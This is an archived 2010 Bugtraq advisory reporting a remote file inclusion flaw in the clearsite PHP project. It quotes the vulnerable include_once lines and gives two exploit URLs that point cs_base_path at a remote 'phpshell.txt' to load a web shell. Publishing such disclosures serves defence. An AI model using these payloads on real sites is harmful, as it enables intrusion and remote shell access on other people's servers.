lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201005271559.o4RFxfsx014452@www3.securityfocus.com>
Date: Thu, 27 May 2010 09:59:41 -0600
From: admin@...ly.com
To: bugtraq@...urityfocus.com
Subject: clearsite Remote File Include Vulnerability

clearsite Remote File Include Vulnerability
                 
  Script:    http://sourceforge.net/projects/clearsite/
    name:    D0ryAn
location:    libya
 website:    http://www.7b-ly.com 
   email:    admin@...ly.com




     bug:   Remote File Include Vulnerability
    
     you can find the bug in alot of files in the script for ex



device_admin.php
include_once("$cs_base_path/include/aloe/aloe_config.php");

header.php
include_once("$cs_base_path/include/header.php");  >>>> that
include_once("$cs_base_path/include/footer.php");

docs.php
include_once('include/config.php');
include_once("$cs_base_path/include/header.php");      >>>>> that
/*include_once("$cs_base_path/include/sidebar.php"); */




exploit 


http://target/clearsite/docs.php?cs_base_path=phpshell.txt?
http://target/clearsite/admin/decice_admin.php?cs_base_path=phpshell.txt?


thanks for all frind and http://7b-ly.com http://libya4us.com http://7ob-ly.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ